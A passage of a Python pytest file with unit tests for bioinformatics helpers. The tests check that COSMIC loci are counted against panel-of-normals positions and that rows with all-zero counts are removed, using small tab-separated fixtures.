    [start, end] range on the same chromosome; confirm against tabulate_pon.
    """
    # COSMIC table: one chrom-8 point locus, three overlapping chrom-6 loci.
    cosmic = pd.read_csv(StringIO(
        'Accession Number\tchrom\tstart\tend\n'
        'ENST297338\t8\t117869609\t117869609\n'
        'ENST440973\t6\t152129237\t152129237\n'
        'ENST440974\t6\t152129237\t152129238\n'
        'ENST440975\t6\t152129236\t152129238\n'
    ), sep='\t')
    # PON with no positions overlapping the table: result equals the input.
    pon = pd.read_csv(StringIO(
        'chrom\tpos\n'
        '1\t10151\n'
        '1\t10403\n'
        '1\t10415\n'
    ), sep='\t')
    result = tabulate_pon(cosmic, pon, 'test')
    afe(result, cosmic)
    # One PON position hits the chrom-8 locus: the new 'test' column counts 1
    # there and 0 everywhere else.
    pon = pd.read_csv(StringIO(
        'chrom\tpos\n'
        '8\t117869609\n'
        '1\t10403\n'
        '1\t10415\n'
    ), sep='\t')
    cosmic = tabulate_pon(cosmic, pon, 'test')
    expected = pd.read_csv(StringIO(
        'Accession Number\tchrom\tstart\tend\ttest\n'
        'ENST297338\t8\t117869609\t117869609\t1\n'
        'ENST440973\t6\t152129237\t152129237\t0\n'
        'ENST440974\t6\t152129237\t152129238\t0\n'
        'ENST440975\t6\t152129236\t152129238\t0\n'
    ), sep='\t')
    afe(cosmic, expected)
    # A second tabulation keeps the existing 'test' column and adds 'test2';
    # the wider chrom-6 loci accumulate correspondingly higher counts.
    pon = pd.read_csv(StringIO(
        'chrom\tpos\n'
        '8\t117869609\n'
        '6\t152129235\n'
        '6\t152129236\n'
        '6\t152129237\n'
        '6\t152129238\n'
        '6\t152129239\n'
    ), sep='\t')
    cosmic = tabulate_pon(cosmic, pon, 'test2')
    expected = pd.read_csv(StringIO(
        'Accession Number\tchrom\tstart\tend\ttest\ttest2\n'
        'ENST297338\t8\t117869609\t117869609\t1\t1\n'
        'ENST440973\t6\t152129237\t152129237\t0\t1\n'
        'ENST440974\t6\t152129237\t152129238\t0\t2\n'
        'ENST440975\t6\t152129236\t152129238\t0\t3\n'
    ), sep='\t')
    afe(cosmic, expected)
def test_remove_empty():
    """remove_empty drops rows whose count columns are all zero.

    Fixed: the original asserted ``'...' in str(e)`` on the pytest
    ``ExceptionInfo`` object; in modern pytest ``str(excinfo)`` is not the
    exception message, so the check is done with ``pytest.raises(match=...)``,
    which matches against the exception's own string representation.
    """
    # A table with no count columns at all cannot be filtered: expect an error.
    cosmic = pd.read_csv(StringIO(
        'Accession Number\tchrom\tstart\tend\n'
        'ENST297338\t8\t117869609\t117869609\n'
        'ENST440973\t6\t152129237\t152129237\n'
        'ENST440974\t6\t152129237\t152129238\n'
        'ENST440975\t6\t152129236\t152129238\n'
    ), sep='\t')
    with pytest.raises(ValueError, match='No matches to write'):
        remove_empty(cosmic)
    # Every row has at least one non-zero count: nothing is removed.
    cosmic = pd.read_csv(StringIO(
        'Accession Number\tchrom\tstart\tend\ttest\ttest2\n'
        'ENST297338\t8\t117869609\t117869609\t1\t1\n'
        'ENST440973\t6\t152129237\t152129237\t0\t1\n'
        'ENST440974\t6\t152129237\t152129238\t0\t2\n'
        'ENST440975\t6\t152129236\t152129238\t0\t3\n'
    ), sep='\t')
    afe(cosmic, remove_empty(cosmic))
    # Rows with only zero counts (ENST440973, ENST440975) are dropped.
    cosmic = pd.read_csv(StringIO(
        'Accession Number\tchrom\tstart\tend\ttest\ttest2\n'
        'ENST297338\t8\t117869609\t117869609\t1\t1\n'
        'ENST440973\t6\t152129237\t152129237\t0\t0\n'
        'ENST440974\t6\t152129237\t152129238\t0\t2\n'
        'ENST440975\t6\t152129236\t152129238\t0\t0\n'
    ), sep='\t')
    expected = pd.read_csv(StringIO(
        'Accession Number\tchrom\tstart\tend\ttest\ttest2\n'
        'ENST297338\t8\t117869609\t117869609\t1\t1\n'
        'ENST440974\t6\t152129237\t152129238\t0\t2\n'
    ), sep='\t')
    aae(expected.values, remove_empty(cosmic).values)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.